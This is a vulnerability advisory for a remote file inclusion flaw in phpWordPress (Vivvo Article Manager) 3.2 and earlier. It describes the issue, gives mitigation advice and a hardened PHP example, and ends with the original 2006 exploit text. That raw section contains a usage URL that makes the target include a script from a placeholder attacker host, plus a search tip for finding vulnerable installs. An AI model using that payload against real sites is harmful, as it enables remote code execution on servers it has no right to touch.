Vendor: phpWordPress (Vivvo Article Manager)
By: MercilessTurk
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: phpWordPress (Vivvo Article Manager)
Affected Version From: <=3.2
Affected Version To: <=3.2
Patch Exists: YES
Related CWE: N/A
CPE: a:vivvo.net:phpwordpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2006

Author: MercilessTurk

The vulnerability exists because the 'classified_path' parameter of the 'HTML_Category_Menu()' function in 'HTML_function.php' is built from user-supplied input without proper validation. This can be exploited to include arbitrary files from remote locations by supplying a URL in the 'classified_path' parameter.

Mitigation:

Validate the 'classified_path' value before it is passed to include_once(), so that request-supplied data cannot select the included file.
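The following is an added PHP illustration, not Vivvo's code or the advisory's: it contrasts the include pattern the raw advisory quotes further down with a hardened replacement. The function and file names follow the advisory; the `EXPORT_BASE` constant, the `$section` parameter and the allow-list contents are assumptions.

```php
<?php
// Added illustration, not Vivvo's code. Per the advisory, HTML_function.php
// does roughly the following, and with register_globals=On the variable
// $classified_path can be set from the query string, so the include_once()
// becomes a remote file inclusion:
//
//   include_once($classified_path . 'export_category.php');
//
// Hardened version: the include target is never derived from request data.
// The base directory is a fixed constant (assumed name), the candidate must
// be on an allow-list, and the resolved path must stay inside the base.

define('EXPORT_BASE', __DIR__ . '/categories'); // assumed location

function HTML_Category_Menu_safe(string $section): string
{
    // Allow-list of known section directories (assumed values). Anything
    // else, including 'http://...', '..' or embedded null bytes, is rejected.
    $allowed = ['default', 'news', 'classified'];
    if (!in_array($section, $allowed, true)) {
        return '';
    }

    $file = EXPORT_BASE . '/' . $section . '/export_category.php';

    // Belt and braces: resolve symlinks and '..', then confirm the real path
    // is still under EXPORT_BASE before including anything.
    $real = realpath($file);
    $base = realpath(EXPORT_BASE);
    if ($real === false || $base === false || strpos($real, $base . '/') !== 0) {
        return '';
    }

    ob_start();
    include_once $real;
    return (string) ob_get_clean();
}

// The caller supplies a value it controls (configuration, not raw request
// input). Setting register_globals=Off and allow_url_include=Off in php.ini
// removes the remote-include vector independently of this code.
$box_sections_HTML = HTML_Category_Menu_safe('default');
```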

Exploit-DB raw data:

#########################################################################
#MercilessTurk info@kahramanhost.com
#########################################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#########################################################################
#Vulnerable Code in HTML_function.php function HTML_Category_Menu() :
#line 51: include_once($classified_path.'export_category.php');
#if register_globals = On then this code can include $_GET['classified_path']
#in index.php HTML_Category_Menu() function is called:
#line 45:
#$box_sections_HTML=HTML_Category_Menu();
#########################################################################
#Usage:
#http://[target]/[path]/index.php?classified_path=http://[evil_script]?
#########################################################################
#For google searching:Vivvo Article Manager
#########################################################################
#Greetz: sanaldarbe.com members.
#########################################################################

# milw0rm.com [2006-09-09]